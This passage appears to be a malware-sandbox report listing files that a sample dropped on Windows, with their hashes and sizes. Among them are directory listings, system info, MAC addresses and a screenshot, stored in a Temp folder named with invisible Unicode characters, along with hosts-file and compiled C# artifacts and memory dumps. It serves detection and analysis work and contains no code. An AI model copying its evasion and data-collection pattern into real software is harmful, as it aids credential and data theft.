0997fa54c5aacae034f50e84e88bc44c

SHA1
017bf8f0be18503be7f5f1de25b56408920d4ccf

SHA256
fecb4c99712ca20c2e74c1b1420cea975ccd891a5d460dd494cc394de0f5df0c

SHA512
9be107c47cdf484c65b7efe2c26192cff22257b5f405a2ba7f2551f9c94025722f4225cf4f921927f1f975d29eb3690012ae858495a19b7c5a7cedd59adceb86

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎‎ \Directories\Music.txt

Filesize
353B

MD5
32128ec79c88a858065817ee8d86db45

SHA1
c6235c8fd0d1106506dc8b30b13ea49937cd7a97

SHA256
456b0c31cbc4bc7150e5747a5a9e98e5c2682fdb9f6d23327a55e57fae2da5a9

SHA512
a45b16b51f949fe927b21f2697b475e54111d945512a2fbd13099b733988cd1baf074a4e02dc1e5ed76c5c625567999144a3c54de24fe7ba19b9f6f3147090d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎‎ \Directories\Pictures.txt

Filesize
980B

MD5
78d87b9ec187cd98cae9f594fbcfd362

SHA1
aa293128473173f7620a4fec8423bdfbf08a9bb9

SHA256
1b30a983d5bad773630ca56a716027854c89eb5b050bdb602f6a6e06cbe7a97f

SHA512
d8026251d2831df8ac533aa4939c3e2a736817b6e26d9fac7a118863b1db72a1ca7b960ddacade250f0763af3f5522e1f4305d01f660b0af59857e2e2366e5ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎‎ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎‎ \Display (1).png

Filesize
442KB

MD5
5152e547114a4ecfea7e2dd65cb709df

SHA1
5635d4bfb681db3b4bc74fd9690d4fab387147c7

SHA256
5f1c1074ac4a833a1e0c6c364c5a9ea48e1b65a88074ced4ea0f960f86536972

SHA512
5b4ad2830ff0882aabe3eb4342f242e2dcd11fcaa9b0b292e237f2ab3382e4784d9f0c4277c47f5bceff5028ac7dc9b8afed96f52c99826892435706ada94b3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎‎ \System\MAC Addresses.txt

Filesize
232B

MD5
3838eb084cf14bc29ab874bef22ee0a5

SHA1
7c6d20e8093d9f5fc7c864358a78e33238717cde

SHA256
a991f0a7c5742e24ab085647571c37b20df5e9f3fb6405edb928b17c145efc95

SHA512
deb03d889a352bca0e88dd8b4e737f1dbfb5e2ed49f0a9f3f75530562c65e17d06830ad19191af55adf44d68f69bb12aaf33791893b7c4b44e53430a08e468b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎‎ \System\System Info.txt

Filesize
2KB

MD5
b408c4be942bce2f1ee3e9bc13621e8d

SHA1
897f64d78583a588fb16d8a2d0b8f61a6134cbbb

SHA256
4bf3d10ff885bb1430864797db0a6116dcb215fbe21f090784d6a2f0dc404781

SHA512
6b9125613ba96889bb4b54eab4be2bfbb91cea6f39f76ab668b9d9eb8536d70bfb3a75b32df9dcd8f13ffa7706c13140f23f8eae6f8c137f25fa5da9c58c84e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‎‎ \System\Task List.txt

Filesize
11KB

MD5
b1a717e30f1c1ceb391e91c9731898fe

SHA1
c8663b4a2fcbb4271be2e71d6c28ec70fe52adb8

SHA256
ba6f31c34bd72f4d5d508d23b820c9cc0dde0714fb5be727751004fe3cf7ce3c

SHA512
4126e7b05e32c24a9e267daa36cc0435b3455ece8109e9b3e1b30550423da49c760b4bbeae6e963b25c97eb210ac21703b33fc949eb00c662f0d5550c74cd5ca

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l0mmrxy4\CSC8E19950176F042498350F49F1B4CF3C.TMP

Filesize
652B

MD5
d99958386a01bc134c77c831907ea78f

SHA1
6fb69d4d1ead5f37e7657cada1044e6dabf95d6c

SHA256
ad4b17031146756ba35d76fb21fc6bd3ccd2fc57a8d9340698ee51f1c98a3da4

SHA512
4e69e75f32a0b00610030e91bd0f6b9d6ce077bc3aa813d2ba8444d6da86e0c73c96bdc6b0f240bf2bc5db35fe593e92ffa6935876e9af86f9131b506dbc4d7e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l0mmrxy4\l0mmrxy4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l0mmrxy4\l0mmrxy4.cmdline

Filesize
607B

MD5
2900a0bee887f4161f996a8ca0da96fe

SHA1
28df883fa41e08d2622a70ca904b80a6f9091992

SHA256
148e002d5911d251f72da2c47d3277d6b8842f50cf810d6fdb5509e0dc50583d

SHA512
852c55e26eb01ada7ce89aa2213f81ba6d416a32d4467ee3f90d0961c26dd2f0fdc3ef5c8f1ede40297f99eb87d97fa5742c07a11f6b4299e977868190ca2722

Download Submit
memory/2212-156-0x00000274DD7B0000-0x00000274DD7B8000-memory.dmp

Filesize
32KB

Download
memory/3004-79-0x00007FF9C9DF3000-0x00007FF9C9DF5000-memory.dmp

Filesize
8KB

Download
memory/3004-89-0x00000276741E0000-0x0000027674202000-memory.dmp

Filesize
136KB

Download
memory/3580-117-0x00007FF9DFA60000-0x00007FF9DFA7F000-memory.dmp

Filesize
124KB

Download
memory/3580-196-0x00007FF9DEEB0000-0x00007FF9DEEC9000-memory.dmp

Filesize
100KB

Download
memory/3580-58-0x00007FF9DFA60000-0x00007FF9DFA7F000-memory.dmp

Filesize
124KB

Download
memory/3580-66-0x00007FF9DE680000-0x00007FF9DE6AE000-memory.dmp

Filesize
184KB

Download
memory/3580-54-0x00007FF9DFB70000-0x00007FF9DFB9D000-memory.dmp

Filesize
180KB

Download
memory/3580-180-0x00007FF9DA640000-0x00007FF9DA7A9000-memory.dmp

Filesize
1.4MB

Download
memory/3580-60-0x00007FF9DA640000-0x00007FF9DA7A9000-memory.dmp

Filesize
1.4MB

Download
memory/3580-64-0x00007FF9E3CF0000-0x00007FF9E3CFD000-memory.dmp

Filesize
52KB

Download
memory/3580-63-0x00007FF9DEEB0000-0x00007FF9DEEC9000-memory.dmp

Filesize
100KB

Download
memory/3580-78-0x00007FF9D9EF0000-0x00007FF9DA008000-memory.dmp

Filesize
1.1MB

Download
memory/3580-75-0x00007FF9E3DA0000-0x00007FF9E3DC4000-memory.dmp

Filesize
144KB

Download
memory/3580-76-0x00007FF9DEEA0000-0x00007FF9DEEAD000-memory.dmp

Filesize
52KB

Download
memory/3580-73-0x00007FF9DE660000-0x00007FF9DE674000-memory.dmp

Filesize
80KB

Download
memory/3580-69-0x00007FF9CAC40000-0x00007FF9CB0AE000-memory.dmp

Filesize
4.4MB

Download
memory/3580-70-0x00007FF9CA8C0000-0x00007FF9CAC35000-memory.dmp

Filesize
3.5MB

Download
memory/3580-71-0x00007FF9DA870000-0x00007FF9DA928000-memory.dmp

Filesize
736KB

Download
memory/3580-47-0x00007FF9E3DA0000-0x00007FF9E3DC4000-memory.dmp

Filesize
144KB

Download
memory/3580-56-0x00007FF9E1F50000-0x00007FF9E1F69000-memory.dmp

Filesize
100KB

Download
memory/3580-48-0x00007FF9E3D90000-0x00007FF9E3D9F000-memory.dmp

Filesize
60KB

Download
memory/3580-243-0x00007FF9DE680000-0x00007FF9DE6AE000-memory.dmp

Filesize
184KB

Download
memory/3580-25-0x00007FF9CAC40000-0x00007FF9CB0AE000-memory.dmp

Filesize
4.4MB

Download
memory/3580-248-0x00007FF9D9EF0000-0x00007FF9DA008000-memory.dmp

Filesize
1.1MB

Download
memory/3580-247-0x00007FF9DEEA0000-0x00007FF9DEEAD000-memory.dmp

Filesize
52KB

Download
memory/3580-246-0x00007FF9DE660000-0x00007FF9DE674000-memory.dmp

Filesize
80KB

Download
memory/3580-245-0x00007FF9DA870000-0x00007FF9DA928000-memory.dmp

Filesize
736KB

Download
memory/3580-244-0x00007FF9CA8C0000-0x00007FF9CAC35000-memory.dmp

Filesize
3.5MB

Download
memory/3580-242-0x00007FF9CAC40000-0x00007FF9CB0AE000-memory.dmp

Filesize
4.4MB

Download
memory/3580-241-0x00007FF9DEEB0000-0x00007FF9DEEC9000-memory.dmp

Filesize
100KB

Download
memory/3580-240-0x00007FF9DA640000-0x00007FF9DA7A9000-memory.dmp

Filesize
1.4MB

Download
memory/3580-239-0x00007FF9DFA60000-0x00007FF9DFA7F000-memory.dmp

Filesize
124KB

Download
memory/3580-238-0x00007FF9E1F50000-0x00007FF9E1F69000-memory.dmp

Filesize
100KB

Download
memory/3580-237-0x00007FF9DFB70000-0x00007FF9DFB9D000-memory.dmp

Filesize
180KB

Download
memory/3580-236-0x00007FF9E3D90000-0x00007FF9E3D9F000-memory.dmp

Filesize
60KB

Download
memory/3580-235-0x00007FF9E3DA0000-0x00007FF9E3DC4000-memory.dmp

Filesize
144KB

Download
memory/3580-234-0x00007FF9E3CF0000-0x00007FF9E3CFD000-memory.dmp

Filesize
52KB

Download